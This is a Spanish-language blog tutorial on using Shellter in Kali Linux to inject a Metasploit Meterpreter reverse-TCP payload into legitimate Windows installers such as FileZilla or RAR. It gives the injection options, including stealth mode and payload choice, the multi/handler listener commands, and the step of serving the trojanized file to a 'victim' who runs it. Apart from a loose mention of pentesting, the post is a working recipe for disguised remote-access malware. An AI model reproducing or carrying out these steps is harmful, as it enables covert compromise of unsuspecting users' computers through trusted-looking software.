INSTALAR Y USAR SHELLTER DESDE KALI LINUX 2.0

Hoy me desperté muy temprano y he decidido mostrar muchas herramientas en el cual ayer mostré una herramienta y a mucha gente no le ha gustado. Pero creadpag mostramos piezas por piezas. Es decir puedes hacer un trió o puedes ser una orgía con muchas herramientas combinadas para hacer un buen pentesting.

¿Pero que significa SHELLTER?

Shellter es una herramienta de inyección de código shell dinámica, y probablemente el primero infecta PE dinámico jamás creado.
Se puede utilizar para inyectar código shell en las aplicaciones nativas de Windows (en la actualidad sólo aplicaciones de 32 bits).
El código shell puede ser algo tuyo o algo generado a través de un marco, como Metasploit.
Se aprovecha de la estructura original del archivo PE y no se aplica ninguna modificación como cambiar los permisos de acceso de memoria en las secciones (a menos que el usuario desee), añadiendo una sección extra con acceso RWE, y todo lo que se vería poco fiables bajo una exploración AV .
Shellter utiliza un enfoque dinámico único que se basa en el flujo de ejecución de la aplicación de destino, y esto es sólo la punta del iceberg.
Shellter no es sólo un infector EPO que trata de encontrar un lugar para insertar una instrucción para redireccionar la ejecución a la carga útil. A diferencia de cualquier otra infección,  avanza por  motor de la infección nunca se transfiere el flujo de ejecución a una cueva de código o de una sección añadida en el archivo PE infectada.

Vamos a descargarlo aqui.Shellter V [5.9]

Les explico algo rápido de la herramienta. Ustedes puedes descargar cualquier software de instalacion .exe de 32bits puede ser “FILEZILLA” “RAR” “ZIP” etc.
Al obtener este software descargado ustedes solo colocarán ese archivo en su carpeta de SHELLTHER.
Screenshot from 2016-01-10 15:44:15

 cd Downloads/shellter/

Para ejecutarlo

 wine shellter.exe

 

Screenshot from 2016-01-10 15:46:26

Al ejecutar nos menciona algunas opciones sobre la herramienta.  Colocamos “A” para que sea todo automático.

Y colocamos el software descargado .exe. Recuerden puede ser “FILEZILLA, rar, zip, etc”

Screenshot from 2016-01-10 15:47:50

Al ejecutar el programa comenzará hacer su inyección en la herramienta.

Screenshot from 2016-01-10 15:49:29

Nos lanzara otras opciones que te va ha servir para la inyección.

  • Primera opción : Activar Stealth (Y)
  • Segunda opción: LISTA DE PAYLOAD (L)
  • Tercer opción: El numero del PAYLOAD en mi paso usaremos la común y efectiva. (1)

Luego nos pide más opciones es como hicieras el mismo proceso de msfconsole.

SET LHOST= TU IP
SET LPORT=8080-4444
Se recomienda el 8080 pero si gusta puede usar el que quieras.

Screenshot from 2016-01-10 15:53:36
Al terminar solo presionamos enter y nos va ha crear otro archivo nombre.exe.bak.

Ahora usaremos nuestra consola para msfconsole.
ACTIVAMOS

 service postgresql start
 msfconsole

Screenshot from 2016-01-10 15:58:00

Para ejecutar un exploit usaremos handler

 use exploit/multi/handler
 set LHOST IP
 set LPORT Puerto

Recomiendo 8080
Usaremos el mismo PAYLOAD que ejecutamos con shellter.

 set PAYLOAD windows/meterpreter/reverse_tcp

Para ejecutar el exploit

 exploit -j

Le enviamos a la victima el paquete.

En el cual usaremos SIMPLEHTTPSERVER   este software no le gusto a la gente pero esta bueno para hacer practicas.

Y listo enviamos el paquete la victima y lo ejecutará y hacemos muchas cosas.

RECUERDEN:

Todos los software puede servir así sea su funcionamiento pequeño pero lo puede hacer una buena combinación. Espero que te guste y compártelo con tus amigos.

Este post se actualiza desde aqui.

Unos de los usuario me reporto que shellter no corría en su maquina y me llamo mucho la atención que decidí a usarla, pero tenia mucha razón con la actualización del 2016.1 esta herramienta no se puede ejecutar pero solo con 64bits porque la de 32bits corre normal.
Pero no vamos ni a formatear la maquina sino vamos a usar un simple comando.

Screenshot from 2016-02-06 15-06-26

Como ven en la imagen la versión es 1.8 de wine lo que hice fue borrarlo y volverlo a instalar pero no funciono

vamos con la solucion

 apt-get -y --no-install-recommends install wine32 

Con ese simple comando podemos usar shellter. Le doy un ejemplo wine era de 64 bits pero el programa corre con 32bits entonces instalamos el wine32 y listo.
Si tienen alguno problema reporteen a mi o a KALI LINUX.